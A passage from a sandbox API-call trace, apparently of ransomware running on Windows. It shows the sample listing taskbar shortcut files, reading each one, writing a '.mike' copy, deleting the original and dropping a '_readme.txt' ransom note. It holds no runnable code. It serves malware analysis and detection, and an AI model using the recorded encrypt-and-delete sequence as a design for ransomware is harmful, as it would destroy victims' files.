ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0158.574] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6477260, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x123526f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0158.574] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6477260, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x123526f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 0 [0158.574] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0158.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0158.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0158.575] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.576] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0158.576] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6477260, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x123526f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0158.577] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.577] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0158.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0158.578] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.578] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.578] CoTaskMemFree (pv=0x508980) [0158.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0158.579] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.579] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.579] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0158.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0158.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0158.580] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.581] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.581] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0158.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0158.582] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.582] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.582] CoTaskMemFree (pv=0x508980) [0158.582] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0158.584] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6477260, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x123526f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.585] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x123526f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0xd3, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0158.585] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x5a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0158.586] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~2.LNK")) returned 1 [0158.586] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0158.586] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.587] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0158.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0158.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0158.588] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.590] GetFileType (hFile=0x1c8) returned 0x1 [0158.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0158.590] GetFileType (hFile=0x1c8) returned 0x1 [0158.590] CloseHandle (hObject=0x1c8) returned 1 [0158.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af048) returned 1 [0158.594] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0158.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0158.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af018) returned 1 [0158.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af014) returned 1 [0158.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af018) returned 1 [0158.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af014) returned 1 [0158.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd0) returned 1 [0158.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefcc) returned 1 [0158.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef38) returned 1 [0158.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef34) returned 1 [0158.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeed4) returned 1 [0158.597] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.598] GetFileType (hFile=0x1c8) returned 0x1 [0158.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeed0) returned 1 [0158.598] GetFileType (hFile=0x1c8) returned 0x1 [0158.598] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x0 [0158.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef80) returned 1 [0158.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef7c) returned 1 [0158.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeec4) returned 1 [0158.600] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.601] GetFileType (hFile=0x1c8) returned 0x1 [0158.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeec0) returned 1 [0158.601] GetFileType (hFile=0x1c8) returned 0x1 [0158.601] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef54*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2aef54*=0) returned 0x0 [0158.601] ReadFile (in: hFile=0x1c8, lpBuffer=0x21a8d00, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef60, lpOverlapped=0x0 | out: lpBuffer=0x21a8d00*, lpNumberOfBytesRead=0x2aef60*=0x5a9, lpOverlapped=0x0) returned 1 [0158.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeed4) returned 1 [0158.603] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.604] GetFileType (hFile=0x1c8) returned 0x1 [0158.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeed0) returned 1 [0158.604] GetFileType (hFile=0x1c8) returned 0x1 [0158.604] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x220 [0158.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeedc) returned 1 [0158.605] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.605] GetFileType (hFile=0x1c8) returned 0x1 [0158.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeed8) returned 1 [0158.606] GetFileType (hFile=0x1c8) returned 0x1 [0158.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd0) returned 1 [0158.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefcc) returned 1 [0158.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af018) returned 1 [0158.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af014) returned 1 [0158.609] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk", dwFileAttributes=0x80) returned 1 [0158.609] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk")) returned 1 [0158.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd0) returned 1 [0158.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefcc) returned 1 [0158.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef00) returned 1 [0158.611] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0158.612] GetFileType (hFile=0x1c8) returned 0x1 [0158.612] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeefc) returned 1 [0158.612] GetFileType (hFile=0x1c8) returned 0x1 [0158.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0158.614] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.614] GetFileType (hFile=0x1c8) returned 0x1 [0158.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0158.615] GetFileType (hFile=0x1c8) returned 0x1 [0158.615] CloseHandle (hObject=0x1c8) returned 1 [0158.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af048) returned 1 [0158.615] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0158.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0158.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af018) returned 1 [0158.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af014) returned 1 [0158.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af018) returned 1 [0158.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af014) returned 1 [0158.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd0) returned 1 [0158.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefcc) returned 1 [0158.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef38) returned 1 [0158.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef34) returned 1 [0158.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeed4) returned 1 [0158.619] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.619] GetFileType (hFile=0x1c8) returned 0x1 [0158.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeed0) returned 1 [0158.620] GetFileType (hFile=0x1c8) returned 0x1 [0158.620] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x0 [0158.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef80) returned 1 [0158.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef7c) returned 1 [0158.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeec4) returned 1 [0158.622] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.622] GetFileType (hFile=0x1c8) returned 0x1 [0158.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeec0) returned 1 [0158.622] GetFileType (hFile=0x1c8) returned 0x1 [0158.622] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef54*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2aef54*=0) returned 0x0 [0158.623] ReadFile (in: hFile=0x1c8, lpBuffer=0x21bab00, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef60, lpOverlapped=0x0 | out: lpBuffer=0x21bab00*, lpNumberOfBytesRead=0x2aef60*=0x4cc, lpOverlapped=0x0) returned 1 [0158.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeed4) returned 1 [0158.625] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.625] GetFileType (hFile=0x1c8) returned 0x1 [0158.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeed0) returned 1 [0158.626] GetFileType (hFile=0x1c8) returned 0x1 [0158.626] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x220 [0158.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeedc) returned 1 [0158.628] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.628] GetFileType (hFile=0x1c8) returned 0x1 [0158.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeed8) returned 1 [0158.629] GetFileType (hFile=0x1c8) returned 0x1 [0158.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd0) returned 1 [0158.630] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefcc) returned 1 [0158.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af018) returned 1 [0158.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af014) returned 1 [0158.631] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk", dwFileAttributes=0x80) returned 1 [0158.631] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk")) returned 1 [0158.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd0) returned 1 [0158.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefcc) returned 1 [0158.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef00) returned 1 [0158.633] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0158.634] GetFileType (hFile=0x1c8) returned 0x1 [0158.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeefc) returned 1 [0158.635] GetFileType (hFile=0x1c8) returned 0x1 [0158.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0158.636] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: 